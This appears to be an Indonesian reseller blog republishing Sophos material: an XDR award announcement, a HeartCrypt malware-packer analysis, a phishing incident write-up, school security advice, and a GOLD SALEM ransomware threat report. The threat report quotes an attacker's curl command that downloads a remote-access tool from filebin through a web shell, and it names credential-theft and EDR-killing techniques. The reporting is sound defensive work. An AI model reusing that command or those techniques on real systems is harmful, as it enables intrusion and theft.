Author: hadi s

Kami dengan bangga mengumumkan bahwa Sophos telah dinobatkan sebagai Leader dalam IDC MarketScape™: Worldwide Extended Detection and Response (XDR) Software 2025. Kami percaya pengakuan ini mencerminkan komitmen kami untuk menghadirkan solusi keamanan yang cerdas, terintegrasi, dan dapat diskalakan guna membantu organisasi tetap selangkah lebih maju dari ancaman. IDC MarketScape untuk Extended Detection and Response menyebutkan kemampuan perlindungan Sophos sebagai salah satu kekuatan, dengan mencatat: “Sophos dipandang positif dalam hal perlindungan yang diberikannya. Teknologi perlindungan utama yang disertakan sebagai fitur standar pada endpoint mencakup firewall berbasis host dan IDS/IPS, kontrol perangkat, DLP, pemindaian antimalware, dan enkripsi.” Laporan tersebut juga menyoroti kemampuan pertahanan proaktif Sophos dengan menyatakan: “Secara umum dikenal sebagai ‘Shields Up,’ Adaptive Attack Protection Sophos diperkenalkan pada 2023. Proteksi serangan adaptif ini secara otomatis menegakkan perlindungan tertentu jika terdapat bukti adanya serangan ‘hands-on-keyboard’.” “Walaupun Sophos telah mengerjakan banyak teknologi ini secara internal, integrasi platform Taegis XDR menambah kekuatan pada kapabilitas yang ada dan mempercepat siklus rekayasa untuk inisiatif-inisiatif baru.” — Chris Kissel, IDC Ketika menyoroti kapan harus mempertimbangkan Sophos, laporan tersebut menyatakan: “Sophos memiliki kehadiran internasional, dan ekosistemnya dirancang untuk memberdayakan bisnis dari berbagai ukuran dan jenis. Pemula, pengguna tingkat menengah, dan pakar keamanan siber akan mendapatkan nilai dari platform Sophos XDR.” Sophos XDR: Inovasi yang menghasilkan dampak Sophos Extended Detection and Response (XDR) menyediakan alat canggih dan intelijen ancaman yang memungkinkan Anda mendeteksi, menyelidiki, dan menetralkan ancaman di seluruh ekosistem TI Anda, disampaikan melalui platform terbuka, adaptif, dan AI-native dari Sophos. Mulai dengan pertahanan terkuat: Organisasi dapat memfokuskan investigasi dengan mencegah lebih banyak pelanggaran sebelum terjadi. Sophos XDR mencakup perlindungan unggulan dari Sophos Endpoint untuk menghentikan ancaman tingkat lanjut dengan cepat sebelum berkembang. Percepat operasi keamanan dengan AI: Alat AI dalam Sophos XDR membantu menyederhanakan investigasi dengan menyediakan wawasan real-time, mengontekstualisasi data ancaman, dan menawarkan rekomendasi berbasis bahasa alami. Dirancang bersama analis keamanan garis depan kami, Sophos AI Assistant memungkinkan tim internal Anda memanfaatkan alur kerja dan pengalaman nyata dari para ahli Sophos. Perlindungan identitas terintegrasi: Sophos menghadirkan visibilitas mendalam di lapisan identitas dan lingkungan cloud. Dengan ITDR, pemantauan Kubernetes, serta integrasi dengan Microsoft Entra ID dan O365, kami mengamankan semuanya mulai dari endpoint hingga workload cloud. Pertahanan otomatis dan adaptif: Sophos menawarkan serangkaian respons otomatis—mulai dari isolasi endpoint hingga penegakan MFA dan pemulihan kerusakan ransomware. Fitur pertahanan adaptif kami aktif selama serangan berlangsung, meminimalkan dampak dan memungkinkan pemulihan cepat. Fleksibilitas ekosistem: Dengan ekosistem integrasi yang luas, Sophos XDR menyatu secara mulus ke berbagai tumpukan TI. Baik pelanggan menggunakan firewall, platform email, atau endpoint pihak ketiga, Sophos meningkatkan investasi yang sudah ada tanpa gangguan. Platform terbuka yang dirancang untuk mengoptimalkan dan menyatukan: Manfaatkan tampilan tunggal di seluruh ekosistem TI Anda dalam platform deteksi dan respons yang terpadu, dan fokuslah pada item prioritas tinggi, bukan pada peringatan yang bising dan tidak dapat ditindaklanjuti. Arsitektur terbuka dan ekstensibel kami memberikan visibilitas di seluruh permukaan serangan dengan mengintegrasikan informasi ancaman dari investasi keamanan Anda saat ini maupun mendatang. Integrasi Secureworks yang mengubah permainan Setelah akuisisi Secureworks pada Februari 2025, Sophos Endpoint kini terintegrasi secara native dan otomatis termasuk dalam langganan Taegis XDR dan MDR. Tonggak ini menghadirkan pencegahan, deteksi, dan respons dalam satu platform dengan biaya lisensi lebih rendah dan operasi yang lebih sederhana. Integrasi ini memperkuat perlindungan, mempercepat mitigasi ancaman, dan memastikan pelanggan memaksimalkan ROI sambil mempertahankan fleksibilitas. Validasi industri yang berarti Sophos XDR tidak hanya memimpin dalam inovasi; ia memperoleh kepercayaan dari berbagai pihak. Mulai dari analis hingga pengguna akhir, pengakuannya jelas: Sophos dinobatkan sebagai Leader dalam Gartner® Magic Quadrant™ untuk Endpoint Protection Platforms selama 16 laporan berturut-turut. Sophos dinobatkan sebagai Leader dalam 2025 Frost Radar™ untuk Managed Detection and Response. Sophos dinobatkan sebagai Gartner “Customers’ Choice” untuk EPP selama empat tahun berturut-turut, “Customers’ Choice” untuk MDR selama dua tahun berturut-turut, dan “Customers’ Choice” untuk XDR dalam versi perdana laporan tersebut. Sophos adalah SATU-SATUNYA vendor yang dinobatkan sebagai “Customers’ Choice” dalam EPP dan XDR. Sophos dinobatkan sebagai G2 Leader dalam Endpoint Protection, EDR, MDR, Firewall, dan XDR dalam Laporan Grid Musim Gugur 2025. Validasi yang konsisten ini memperkuat posisi Sophos sebagai mitra utama bagi organisasi yang mencari hasil keamanan yang terbukti dan berdampak tinggi. Apa selanjutnya: Membangun masa depan XDR Kami percaya dinobatkannya Sophos sebagai Leader dalam IDC MarketScape™ merupakan tonggak yang mencerminkan kemajuan kami. Ini juga menandai awal dari bab berikutnya: Integrasi penuh Taegis XDR ke dalam platform Sophos Central. Baca cuplikan IDC MarketScape™: Worldwide Extended Detection and Response (XDR) Software 2025 di sini. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan QFirewall indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi Qfirewall.ilogoindonesia.id untuk informasi lebih lanjut!

HeartCrypt adalah layanan packer-as-a-service (PaaS) yang digunakan oleh banyak pelaku ancaman (bukan hanya satu grup) untuk menyamarkan malware di dalam aplikasi yang tampak sah. Packer ini memodifikasi file executable legal, menyuntikkan loader berbahaya, dan menyisipkan payload terenkripsi. Temuan Utama 1. Pola serangan yang konsisten Setiap sampel serangan yang dianalisis memiliki ciri yang sama: Malware berpura-pura menjadi aplikasi sah (CCleaner, PDF reader, NW.js, dan banyak lainnya) Loader berupa PIC (position-independent code) disuntikkan ke bagian .text Payload berbahaya ditanam sebagai resource tambahan (disamarkan sebagai BMP) Payload dienkripsi XOR dengan kunci yang mudah terlihat Payload biasanya RAT atau infostealer: Lumma Stealer, Rhadamanthys, AsyncRAT, AVKiller, dll. Distribusi melalui email phishing + file ZIP berpassword Google Drive / Dropbox Sophos menganalisis ribuan sampel dan hampir 1000 server C2. 2. Berbagai rantai infeksi di banyak negara HeartCrypt dipakai oleh banyak aktor, sehingga metode penyebaran bervariasi, tergantung negara: Contoh kasus: a. Italia — DLL sideloading + phishing Email berpura-pura sebagai pemberitahuan pelanggaran hak cipta File ZIP berisi: executable palsu DLL msimg32.dll berisi loader HeartCrypt PDF umpan (decoy) Payload: Lumma Stealer b. Kolombia — Email dengan ZIP berpassword Email tampak berasal dari Kejaksaan Kolombia Tautan tersembunyi berupa titik “.” ZIP berpassword 7771 disimpan di Google Drive Payload: AsyncRAT c. Italia lagi — LNK + PowerShell Shortcut LNK dengan ikon PDF tapi menjalankan PowerShell Mengunduh batch file & PDF umpan dari Dropbox Payload: Rhadamanthys Stealer 3. Cara kerja HeartCrypt di dalam file Modifikasi file executable Menyisipkan kode PIC ke .text Menambah resource palsu (bitmap) berisi shellcode Menggunakan ratusan instruksi junk (JMP/CALL) untuk obfuscation Anti-analisis / anti-emulator Memanggil DLL palsu yang tidak mungkin ada (k7rn7l32.dll) Mengakses fungsi kernel32 yang hanya ada di emulator Jika tes ini “berhasil”, loader berhenti — artinya ia mendeteksi sandboxes. Eksekusi payload Loader memakai API seperti: CreateProcessW VirtualAlloc NtCreateThreadEx CreateRemoteThread Payload terenkripsi XOR, dengan kunci berupa string ASCII berulang. Contoh kunci yang menunjukkan emosi/frustrasi pelaku: MENOLOVECROWDSTRIKE ANDREYISNOTHAPPEITE f*ckSsentinc 4. Persistensi HeartCrypt biasanya: Menyalin dirinya ke folder pengguna (Pictures, Videos, Documents) Memperbesar ukuran file dengan menambah 900MB padding Mendaftarkan autorun melalui registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5. Payload yang sering ditemukan Payload HeartCrypt biasanya: Lumma Stealer Rhadamanthys AsyncRAT Redline Vidar AgentTesla Dan yang makin mengkhawatirkan: AVKiller DeveloperTest Ada satu payload bernama DeveloperTest — hanya menampilkan message box. Diduga dibuat developer HeartCrypt untuk menguji deteksi antivirus. Ini kemungkinan “awal mula” HeartCrypt. 6. Keterkaitan dengan ransomware HeartCrypt juga terlihat dalam insiden ransomware besar: a. Ransomhub Loader HeartCrypt menyebarkan AVKiller, lalu ransomware aktif Menargetkan produk ESET, Kaspersky, Sophos, Symantec Menggunakan driver bersertifikat palsu b. MedusaLocker HeartCrypt muncul sebelum eksekusi Medusa Diduga terkait eksploit zero-day ConnectWise & BeyondTrust 7. Negara-negara target Analisis nama file dan laporan lapangan menunjukkan target global: Kolombia (terbanyak) Italia Brasil Meksiko Peru Prancis Yunani Kazakhstan Korea Selatan Rusia Taiwan Ukraina Belanda Thailand Argentina …dan banyak lainnya. Nama file disesuaikan bahasa lokal untuk meningkatkan efektivitas phishing. 8. Kesimpulan Meskipun bukan PaaS baru, HeartCrypt masih sangat aktif dan semakin tersebar. Alasan keberhasilannya: Mudah dipakai penjahat cyber Bisa mengemas malware apa saja Menyamar menjadi ratusan aplikasi sah Teknik anti-analisis efektif Distribusi global melalui phishing yang tampak meyakinkan Sophos mendeteksi HeartCrypt sebagai Mal/HCrypt. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan QFirewall indonesia, merupakan bagian dari PT. iLogo Infralogy Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi QFirewall.ilogoindonesia.id untuk informasi lebih lanjut!

Seorang karyawan Sophos menjadi korban phishing — tetapi kami berhasil menangkis ancaman tersebut dengan proses pertahanan menyeluruh. Jika Anda bekerja di bidang keamanan siber, Anda mungkin sudah sering mendengar pepatah klasik tentang serangan siber: “Bukan soal jika, tetapi kapan.” Namun, mungkin ada cara berpikir yang lebih tepat: meskipun pelatihan, pengalaman, dan pemahaman terhadap teknik rekayasa sosial dapat membantu, siapa pun tetap bisa tertipu oleh jebakan yang dirancang dengan baik. Setiap orang — termasuk peneliti keamanan — memiliki kerentanan yang dapat dimanfaatkan, tergantung pada situasi, waktu, dan keadaan yang tepat. Perusahaan keamanan siber pun tidak kebal terhadap hal ini. Pada Maret 2025, seorang karyawan senior Sophos menjadi korban phishing dan tanpa sadar memasukkan kredensialnya ke halaman masuk palsu. Hal ini memungkinkan penyerang untuk melewati autentikasi multi-faktor (MFA) dan mencoba — namun gagal — menembus jaringan internal kami. Kami telah menerbitkan analisis akar penyebab eksternal (Root Cause Analysis / RCA) terkait insiden ini di Sophos Trust Center, yang menjelaskan detailnya secara mendalam. Namun, insiden tersebut juga memunculkan beberapa pelajaran menarik yang layak untuk dibagikan. 1. Ancaman Bypass MFA Semakin Umum Bypass MFA kini menjadi teknik yang makin sering digunakan. Seiring meluasnya penerapan autentikasi multi-faktor, para pelaku ancaman pun beradaptasi. Kini, beberapa framework phishing dan layanan phishing-as-a-service bahkan sudah dilengkapi dengan kemampuan untuk melewati MFA — hal ini semakin memperkuat argumen untuk memperluas adopsi passkey yang lebih aman. 2. Tujuan Kami Bukan Sekadar Mengklaim “Kami Aman” Kami membagikan insiden ini bukan untuk menyoroti bahwa kami berhasil menggagalkan serangan — karena itu memang bagian dari pekerjaan kami — tetapi karena insiden ini menjadi contoh yang baik tentang proses pertahanan menyeluruh dari ujung ke ujung, lengkap dengan sejumlah pelajaran penting yang bisa diterapkan siapa pun. 3. Tiga Kunci Utama Respons Kami: Kontrol, Kolaborasi, dan Budaya Kontrol Sistem keamanan kami dibangun dengan lapisan pertahanan berlapis (defense-in-depth) — tujuannya adalah menciptakan ketahanan terhadap kesalahan manusia atau kegagalan kontrol sebelumnya. Prinsip utamanya sederhana: ketika satu kontrol gagal, lapisan berikutnya akan mengambil alih, memberikan perlindungan di sepanjang rantai serangan siber (cyber kill chain). Dalam insiden ini, seperti dijelaskan dalam RCA, terdapat beberapa lapisan kontrol yang berperan — mulai dari keamanan email, MFA, Conditional Access Policy (CAP), manajemen perangkat, hingga pembatasan akun. Meski pelaku berhasil melewati sebagian lapisan, kontrol berikutnya segera aktif untuk menghentikan mereka. Namun, kami tidak berhenti di situ. Setelah ancaman berhasil digagalkan, kami melakukan investigasi mendalam, menganalisis kinerja setiap kontrol, dan meninjau penyebab bypass yang terjadi. Untuk kontrol yang berhasil bekerja, kami bertanya pada diri sendiri: “Bagaimana pelaku bisa mencoba melewati ini di masa depan?” — dan kemudian kami memperkuatnya. Kolaborasi Tim internal kami — mulai dari Sophos Labs, Managed Detection and Response (MDR), Internal Detection and Response (IDR), hingga tim IT internal — bekerja sama secara erat dalam mengeliminasi ancaman. Masing-masing tim berkontribusi sesuai keahliannya, berbagi data, temuan, dan wawasan secara real time. Kami juga terus memperkuat kemampuan pengumpulan intelijen dan mempercepat alur umpan balik — tidak hanya di dalam organisasi, tetapi juga bersama komunitas keamanan global. Kami percaya, intelijen yang dapat dioperasionalkan (dapat digunakan secara langsung untuk pertahanan) adalah kunci utama untuk melindungi ekosistem kami di masa depan. Walaupun kami merespons insiden ini dengan baik, selalu ada ruang untuk menjadi lebih baik lagi. Budaya Kami membangun budaya keamanan yang berfokus pada solusi, bukan kesalahan. Di Sophos, kami tidak menghukum atau menyalahkan karyawan yang tanpa sengaja mengklik tautan phishing. Dalam kasus ini, karyawan yang menjadi korban langsung melapor secara terbuka kepada rekan dan tim keamanan bahwa mereka telah tertipu. Dalam banyak organisasi lain, hal ini mungkin jarang terjadi karena rasa takut atau malu. Ada pula yang memilih diam dengan harapan masalah akan hilang dengan sendirinya — padahal hal itu justru memperburuk keadaan. Di Sophos, setiap orang — tanpa memandang jabatan atau senioritas — didorong untuk segera melapor jika mencurigai adanya aktivitas tidak biasa. Kami memahami bahwa siapa pun bisa tertipu oleh taktik rekayasa sosial pada waktu dan kondisi yang tepat. Sering kali dikatakan bahwa “manusia adalah mata rantai terlemah dalam keamanan.” Kami melihatnya berbeda: manusia juga garis pertahanan pertama. Mereka berperan penting dalam memberi tahu tim keamanan, memvalidasi peringatan otomatis, atau bahkan menjadi pihak pertama yang mendeteksi serangan ketika kontrol teknis belum bereaksi. Kesimpulan Penyerang berhasil menembus perimeter kami, namun kombinasi antara kontrol yang berlapis, kolaborasi antar tim, dan budaya keamanan yang sehat membuat mereka tidak bisa bergerak jauh sebelum kami menyingkirkan mereka sepenuhnya. Melalui tinjauan pasca-insiden yang kami lakukan, kami memperkuat postur keamanan kami untuk menghadapi serangan berikutnya dengan kesiapan lebih baik. Dengan membagikan pelajaran ini secara terbuka dan transparan, baik di sini maupun melalui RCA yang kami publikasikan, kami berharap organisasi lain juga dapat memperkuat pertahanannya — karena di dunia keamanan siber, kita semua belajar bersama. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan Qfirewall indonesia, merupakan bagian dari PT. iLogo Indonesia, yang merupakan mitra terpercaya dalam solusi Infrastruktur IT dan Cybersecurity terbaik di Indonesia. Hubungi kami sekarang atau kunjungi qfirewall.ilogoindonesia.id untuk informasi lebih lanjut!

Saat siswa kembali ke sekolah, sangat penting bagi administrator dan tim TI untuk tetap waspada terhadap aktor ancaman oportunistik. Phishing merupakan vektor akses paling umum untuk infeksi ransomware di lembaga pendidikan dasar dan menengah selama setahun terakhir. Seiring dengan terus meluasnya jejak digital sekolah, ancaman phishing, spam, dan serangan siber lainnya semakin berdampak pada lembaga pendidikan bagi siswa hingga usia 18 tahun. Lembaga-lembaga ini dapat disebut sebagai sekolah dasar, menengah pertama, dan menengah atas, atau secara kolektif disebut “pendidikan dasar dan menengah” atau sekolah K–12. Pusat Keamanan Internet (Center for Internet Security) melaporkan bahwa 82% sekolah K–12 mengalami insiden keamanan siber antara Juli 2023 hingga Desember 2024. Dan insiden-insiden ini sangat mahal. Menurut laporan Sophos 2025 State of Ransomware in Education, biaya rata-rata bagi lembaga pendidikan untuk memulihkan diri dari serangan ransomware mencapai hampir $1 juta secara global, bahkan sebelum mempertimbangkan pembayaran tebusan. Saat siswa kembali ke sekolah, administrator dan tim TI harus tetap waspada terhadap aktor ancaman oportunistik. Penyerang ini berusaha mengeksploitasi berbagai kerentanan, sehingga menempatkan siswa, staf, dan guru dalam risiko. Pertimbangan Perangkat dan Jaringan Melindungi sistem merupakan langkah pertama dalam meningkatkan ketahanan sekolah terhadap serangan. Peningkatan konektivitas Kelas masa kini sangat bergantung pada teknologi, dengan perangkat pembelajaran yang terhubung ke internet serta komputer dan Chromebook yang diberikan oleh sekolah menjadi hal yang umum. Setiap perangkat ini mungkin memiliki kerentanan perangkat keras dan perangkat lunak yang sulit untuk terus diperbarui. Laporan Sophos 2025 State of Ransomware in Education menegaskan pentingnya pembaruan (patching). Kerentanan keamanan yang dieksploitasi menjadi penyebab 21% dari semua serangan ransomware yang berhasil terhadap lembaga pendidikan. Dunia yang Semakin Terkoneksi Perubahan teknologi di sekolah tidak hanya sebatas komputer menggantikan buku teks fisik dan papan tulis pintar menggantikan papan tulis kapur. Proses administratif di belakang layar juga menjadi digital. Sekolah dapat mengelola sistem pembayaran, penyimpanan data, dan infrastruktur lainnya. Konvergensi ini menciptakan ratusan titik kontak digital di setiap sekolah. Semakin dalam teknologi tertanam dalam kegiatan belajar dan administrasi, semakin banyak pula potensi kerentanan keamanan siber. Kontrak Pihak Ketiga dan Hosting Eksternal Sekolah sering kali bergantung pada kontrak pihak ketiga untuk berbagai layanan seperti penjadwalan, e-learning, dan sistem pesan. Layanan-layanan ini mungkin menggunakan kombinasi hosting internal dan eksternal, atau sepenuhnya dihosting secara eksternal. Ketergantungan pada vendor ini menambah jalur risiko baru, karena keamanan vendor tersebut juga harus terjamin. Jika platform vendor diretas, hal itu dapat membuat layanan tidak tersedia atau bahkan memberikan akses ke data sekolah. BYOD dan Pembelajaran Jarak Jauh Pembelajaran jarak jauh serta meningkatnya penggunaan ponsel pribadi oleh anak-anak menimbulkan tantangan “Bring Your Own Device” (BYOD). Siswa mungkin diberi laptop sekolah yang dibawa pulang setiap hari, atau menggunakan perangkat pribadi yang mereka sambungkan ke jaringan sekolah. Perangkat-perangkat ini bisa menjadi titik masuk serangan. Jika perangkat siswa terinfeksi di luar sekolah lalu tersambung ke jaringan sekolah, malware tersebut dapat memperoleh akses ke jaringan sekolah. Ancaman Phishing Spam dan phishing merupakan metode umum yang digunakan penyerang untuk menyusup ke jaringan sekolah. Dalam serangan phishing, aktor ancaman meniru seseorang atau organisasi melalui email untuk menipu individu agar mengungkapkan informasi sensitif. Laporan Sophos 2025 State of Ransomware in Education menunjukkan bahwa phishing merupakan penyebab teknis utama serangan ransomware pada pendidikan dasar dan menengah (22%). Spam melibatkan pengiriman email massal yang kurang dipersonalisasi dengan pendekatan “sebarkan dan berharap berhasil”. Email sebagai vektor serangan Banyak siswa diberikan alamat email sendiri ketika mereka cukup umur. Praktik ini bisa menyebabkan siswa semuda enam tahun menjadi sasaran phishing. Karena masih baru dalam dunia digital, siswa muda lebih mungkin mengklik tautan berbahaya, mengunduh malware, membuat kata sandi yang lemah, dan menggunakan ulang kata sandi. Tanpa keamanan dan autentikasi yang kuat, mereka dapat secara tidak sengaja membuka pintu bagi serangan ransomware yang menghancurkan. Phishing di luar email Penipuan phishing kini juga menyasar pengguna melalui media sosial, layanan streaming, dan layanan berlangganan. Platform-platform ini populer di kalangan siswa K–12, yang mungkin menggunakan perangkat sekolah untuk mengakses layanan tersebut (atau versi palsunya) di luar jam belajar. Serangan ini meniru perusahaan terkenal untuk menipu pengguna agar memberikan informasi pribadi yang sensitif. Serangan semacam itu sangat mahal. Menurut laporan Sophos 2025 State of Ransomware, sekolah K–12 memiliki biaya pemulihan tertinggi di antara semua industri, dengan rata-rata $2,28 juta, belum termasuk tebusan yang dibayarkan korban. Sumber Daya Terbatas, Risiko Meningkat Sekolah dan pendidik menghadapi berbagai tantangan: ukuran kelas yang semakin besar, anggaran yang menurun, dan sumber daya yang terbatas. Selain itu, Information Commissioner’s Office di Inggris melaporkan peningkatan serangan siber di sekolah yang berasal dari ancaman internal, termasuk siswa yang secara tidak sengaja atau sengaja mengkompromikan jaringan sekolah. Menjaga agar teknologi berfungsi dengan baik bagi staf dan siswa menghabiskan sebagian besar sumber daya TI yang tersedia. Di luar jam sekolah, tim TI memiliki kendali terbatas atas aktivitas digital siswa, sehingga meningkatkan risiko. Laporan State of Ransomware 2025 menemukan bahwa 42% sekolah K–12 mengalami kesulitan mendeteksi dan menghentikan serangan tepat waktu, menunjukkan pentingnya tindakan pencegahan proaktif. Angka ini sebanding dengan industri lain seperti energi, minyak/gas, dan utilitas (43%), serta manufaktur dan produksi. Cara Sekolah K–12 Meningkatkan Perlindungan dari Ancaman Siber Ketika sekolah K–12 semakin mengadopsi pembelajaran digital, mereka juga menghadapi risiko keamanan siber yang meningkat — mengancam privasi siswa, mengganggu operasional, dan membebani sumber daya TI. Untuk menghadapi ancaman yang terus berkembang, administrator dan tim TI harus mengadopsi pola pikir pencegahan terlebih dahulu, dengan menggabungkan kontrol keamanan yang kuat, pendidikan berkelanjutan, dan kemitraan strategis. Cegah serangan sebelum terjadi: Sophos menekankan pentingnya menghentikan ancaman sebelum menimbulkan kerugian. Sekolah dapat mengurangi risiko ransomware dan malware dengan menerapkan kontrol keamanan berlapis serta mengedukasi siswa dan staf agar mengenali dan menghindari perilaku berisiko. Misalnya, dengan menggunakan solusi keamanan email pihak ketiga seperti Sophos Email untuk memindai pesan dan memblokir tautan atau kode QR berbahaya sebelum mencapai kotak masuk. Perkuat autentikasi pengguna: Mewajibkan autentikasi multi-faktor (MFA) atau akses tanpa kata sandi membantu siswa dan staf bertanggung jawab atas keamanan digital mereka. Karena siswa mungkin mencari cara untuk menghindarinya, pendidikan dan pemantauan berkelanjutan tetap diperlukan. Manfaatkan sumber daya gratis atau berbiaya rendah: Keterbatasan anggaran tidak boleh menjadi penghalang keamanan. Sekolah dapat menggunakan layanan gratis atau bersubsidi seperti daftar…

Operasi Warlock dari GOLD SALEM Bergabung ke Lanskap Ransomware yang Padat Kelompok baru ini menunjukkan kemampuan teknis yang matang dengan mengikuti pola operasi ransomware umum, namun juga menampilkan tanda-tanda kecerdikan tersendiri. Pemantauan Ancaman Peneliti dari Counter Threat Unit™ (CTU) saat ini memantau kelompok ancaman yang menamakan dirinya Warlock Group. CTU™ melacak kelompok ini dengan sebutan GOLD SALEM. Sejak Maret 2025, kelompok ini telah berhasil mengkompromikan jaringan dan menyebarkan ransomware Warlock mereka. Microsoft menyebut kelompok ini sebagai Storm-2603 dan menilai dengan “tingkat keyakinan moderat” bahwa kelompok ini berbasis di Tiongkok. Namun, peneliti CTU menyatakan bahwa tidak ada cukup bukti untuk mendukung atribusi tersebut. Korban dan Aktivitas Online Hingga pertengahan September 2025, GOLD SALEM telah mempublikasikan 60 korban, menempatkannya di tingkat menengah dibanding operasi ransomware lain pada periode yang sama. Korban GOLD SALEM berkisar dari entitas kecil komersial atau pemerintahan hingga perusahaan multinasional besar di Amerika Utara, Eropa, dan Amerika Selatan. Seperti kebanyakan kelompok ransomware lain, GOLD SALEM menghindari menyerang organisasi di Tiongkok dan Rusia, meskipun keduanya memiliki banyak target potensial. Namun, pada 8 September 2025, kelompok ini memposting nama korban berbasis di Rusia di situs kebocoran data khusus mereka (dedicated leak site / DLS). Korban tersebut adalah perusahaan komersial yang menyediakan layanan dan peralatan rekayasa untuk industri pembangkit listrik. Mengingat pemerintah Rusia dikenal menindak keras kelompok yang menyerang organisasi di wilayahnya, pencantuman korban asal Rusia oleh GOLD SALEM menunjukkan bahwa kelompok ini kemungkinan beroperasi dari luar yurisdiksi tersebut. Aktivitas Forum dan Jejak Awal GOLD SALEM tidak memiliki jejak publik hingga Juni 2025, ketika sebuah akun di forum bawah tanah RAMP yang mewakili kelompok ini memposting permintaan eksploitasi untuk aplikasi perusahaan umum (seperti Veeam, ESXi, SharePoint) dan alat untuk menonaktifkan EDR (Endpoint Detection and Response) serta produk keamanan lainnya. Posting berikutnya meminta kerja sama dengan broker akses awal (Initial Access Brokers/IAB) untuk mendapatkan calon korban. Belum jelas apakah kelompok ini mencari akses untuk melakukan serangan sendiri, merekrut afiliasi untuk membangun ransomware-as-a-service (RaaS) baru, atau keduanya. Infrastruktur Kebocoran Data GOLD SALEM mengoperasikan situs kebocoran berbasis Tor (DLS) untuk mempublikasikan nama korban dan data yang dicuri (lihat Gambar 1). Per 16 September 2025, data dari 19 dari 60 korban (32%) telah dipublikasikan di DLS. Selain itu, pelaku mengklaim telah menjual data dari 27 korban (45%) kepada pembeli pribadi, kemungkinan karena tebusan tidak dibayar. Kelompok kriminal siber kadang memang menjual data curian ke pihak ketiga, namun angka yang dipublikasikan oleh GOLD SALEM kemungkinan dilebih-lebihkan atau dipalsukan. Tiga nama korban yang sebelumnya terdaftar di DLS juga telah dihapus kemudian. Gambar 1: Situs kebocoran GOLD SALEM per 16 September 2025 Pola Aktivitas dan Waktu Publikasi GOLD SALEM juga memposting nama korban yang sebelumnya diserang oleh operasi ransomware lain. Meskipun jarang, hal ini dapat mengindikasikan bahwa: Broker akses menjual akses yang sama ke beberapa pelaku, Afiliasi memposting data curian di beberapa situs, atau Korban gagal menutup celah keamanan yang sama sehingga diserang berulang kali. Sebagai contoh, perusahaan konstruksi asal AS yang dilaporkan diserang pada Juni 2025 sebelumnya juga menjadi korban Hunters International (GOLD CRESCENT) pada Oktober 2024 dan Payout Kings pada Juni 2025. Data yang diterbitkan oleh GOLD SALEM serta metadata dari DLS mereka menunjukkan bahwa kelompok ini mulai melakukan serangan dan pemerasan sejak Maret 2025. Sebuah posting di forum RAMP pada 10 Juni 2025 mengumumkan ransomware Warlock dan menautkan ke versi pertama DLS berbasis Tor. Situs tersebut ditutup sehari kemudian (11 Juni) dan muncul kembali pada akhir Juli 2025. Kelompok ini cenderung mempublikasikan korban secara bertahap (batch), sehingga nama korban baru sering muncul beberapa hari hingga minggu setelah kompromi sebenarnya. Setiap entri korban disertai dengan tanggal “countdown” — tenggat waktu pembayaran tebusan sebelum data korban dipublikasikan (lihat Gambar 2). Biasanya tenggat ini 12–14 hari setelah nama korban muncul di DLS. Gambar 2: Tanggal batas waktu pembayaran tebusan di DLS GOLD SALEM per 16 September 2025 Insiden yang Diamati Pada akhir Juli 2025, peneliti CTU menganalisis sebuah insiden di mana GOLD SALEM menggunakan rantai eksploit ToolShell terhadap server SharePoint untuk mendapatkan akses awal. Eksploit ini menggabungkan beberapa kerentanan: CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, dan CVE-2025-53771. Eksploitasi tersebut menghasilkan pemasangan web shell ASPX yang membuat Process object untuk cmd.exe dalam konteks proses IIS (w3wp.exe), sehingga penyerang dapat mengeksekusi perintah jarak jauh dan melihat hasilnya secara langsung. CTU mengamati perintah berikut dieksekusi melalui web shell: curl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt File yang diunduh adalah server WebSockets berbasis Golang yang memungkinkan akses lanjutan ke server korban tanpa perlu web shell. Selain itu, GOLD SALEM juga menghindari deteksi EDR dengan menggunakan teknik Bring Your Own Vulnerable Driver (BYOVD) dan driver Baidu Antivirus yang rentan (diganti nama menjadi googleApiUtil64.sys) untuk menghentikan agen EDR. Kerentanan pada driver ini (CVE-2024-51324) memungkinkan penghentian proses arbitrer. Menurut profil Microsoft, kelompok ini juga menggunakan Mimikatz untuk menargetkan memori LSASS guna mengekstrak kredensial teks polos, serta menggunakan PsExec dan Impacket untuk pergerakan lateral, dan Group Policy Objects (GPO) untuk menyebarkan muatan ransomware Warlock. Pada Agustus 2025, CTU juga mengamati GOLD SALEM menyalahgunakan alat DFIR open-source Velociraptor untuk membuat tunnel jaringan Visual Studio Code di lingkungan korban. Beberapa insiden ini berakhir dengan penyebaran ransomware Warlock. Mitigasi dan Deteksi Organisasi disarankan untuk: Melakukan pemantauan permukaan serangan (attack surface monitoring) secara rutin. Menerapkan kebijakan patch agresif untuk layanan yang berhadapan langsung dengan internet. Melakukan pemantauan endpoint proaktif dan respons insiden cepat untuk mendeteksi eksploitasi zero-day. Proteksi Sophos yang mendeteksi aktivitas terkait ancaman ini meliputi: Troj/WebShel-F Troj/Warlock-B Untuk mengurangi risiko paparan, peneliti CTU merekomendasikan agar pelanggan menggunakan kontrol keamanan yang tersedia untuk meninjau dan membatasi akses berdasarkan indikator berikut: Indikator Tipe Konteks bfbeac96a385b1e5643ec0752b132506 MD5 hash ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell de25be0afd53a1d274eec02e5303622fc8e7dbd5 SHA1 hash ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1 SHA256 hash ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell b3a099ecca79503a0e4a154bd85d3e6b MD5 hash Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM 6d0cc6349a951f0b52394ad3436d1656ec5fba6a SHA1 hash Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM 